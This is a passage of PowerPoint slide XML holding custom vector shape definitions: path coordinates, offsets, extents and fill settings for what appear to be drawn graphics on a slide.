                  <a:lnTo>
                    <a:pt x="142148" y="732307"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="721639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="563867" y="721639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562725" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721639"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="441195" y="678233"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436558" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="721098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441195" y="678233"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="675157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237870" y="675909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237502" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="675157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="713383"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237502" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="713383"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="668340" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="117499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="702345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27598" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26790" y="713383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35779" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27714" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668183" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672401" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668340" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="238500" y="674243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27057" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35779" y="711787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="675157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="674243"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1044" y="701116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="701308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="701827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="701116"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1044" y="701116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="701116"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="592984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="411470" y="643276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411470" y="683722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415789" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412070" y="682036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416602" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="594264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="592984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="412994" y="681833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412070" y="682036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="436666" y="676651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="681833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415789" y="682777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436558" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441195" y="678233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436666" y="676651"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="236976" y="675157"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236976" y="676068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237870" y="675909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="675157"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="412994" y="643916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="416602" y="643916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="643916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412364" y="644668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416602" y="643916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="11981"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695464" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="696452" y="592984"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="695464" y="592984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="593624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="592984"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="1523" y="118139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="5170" y="118139"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="118891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5170" y="118139"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="694928" y="11460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="696452" y="11460"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695416" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="12171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="11460"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="672401" y="1580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668183" y="1580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="10942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672401" y="158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556AB43B-0DE9-FF17-D893-37951348154B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2760681" y="3487696"/>
              <a:ext cx="127000" cy="66040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="127000" h="66039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126489" y="65531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126489" y="4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055B25FF-3B13-8EED-1502-E828452FD11A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2887171" y="3483125"/>
              <a:ext cx="297180" cy="67310"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="297180" h="67310">
                  <a:moveTo>
                    <a:pt x="297173" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="51815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297173" y="12953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297173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1A2F5C3B-AAEC-4B9E-F656-C32B58D7D706}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862787" y="3417593"/>
              <a:ext cx="36830" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="74929">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="74675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="9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3B6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23EB677C-C5AC-C595-09BF-3AB938C8AA8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625048" y="2878101"/>
              <a:ext cx="36830" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="593089">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="577592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="592832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="14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ED5081D6-487D-A504-31EE-E3013CF160C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2652480" y="2775993"/>
              <a:ext cx="669290" cy="691515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="669289" h="691514">
                  <a:moveTo>
                    <a:pt x="669020" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="691129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="573782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6690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5E1CC7B3-2181-DBCE-1DA2-6CA3A770EFFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2648670" y="2771452"/>
              <a:ext cx="676910" cy="700405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="700207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25863" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3151" y="691917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25842" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="691134"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3151" y="691917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="669020" y="575127"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25863" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="581524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="672170" y="574574"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="574574"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="574574"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="4541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673491" y="8290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="4541"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="121888"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="125084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="25842" y="121888"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25842" y="121888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="669020" y="4541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673491" y="8290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541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B38CEBC9-D318-9181-E4E9-9115E488CDE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2721058" y="2838477"/>
              <a:ext cx="546100" cy="558800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="546100" h="558800">
                  <a:moveTo>
                    <a:pt x="545579" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="558542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545579" y="462530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545579" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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3" name="object 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1099BB-FE28-DD59-C862-3920862963F4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91742" y="3368825"/>
              <a:ext cx="141728" cy="122681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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2FBAF3D2-AFDC-C289-C53A-AB12B30D5CC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2616667" y="2752097"/>
              <a:ext cx="711835" cy="808355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="233166" y="714947"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137156" y="733235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137156" y="763727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269873" y="808236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361863" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269020" y="791357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171897" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190331" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="728819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="271129" y="790977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269020" y="791357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="738498"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361863" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="752511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="148200" y="749750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="751668"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171897" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="749750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
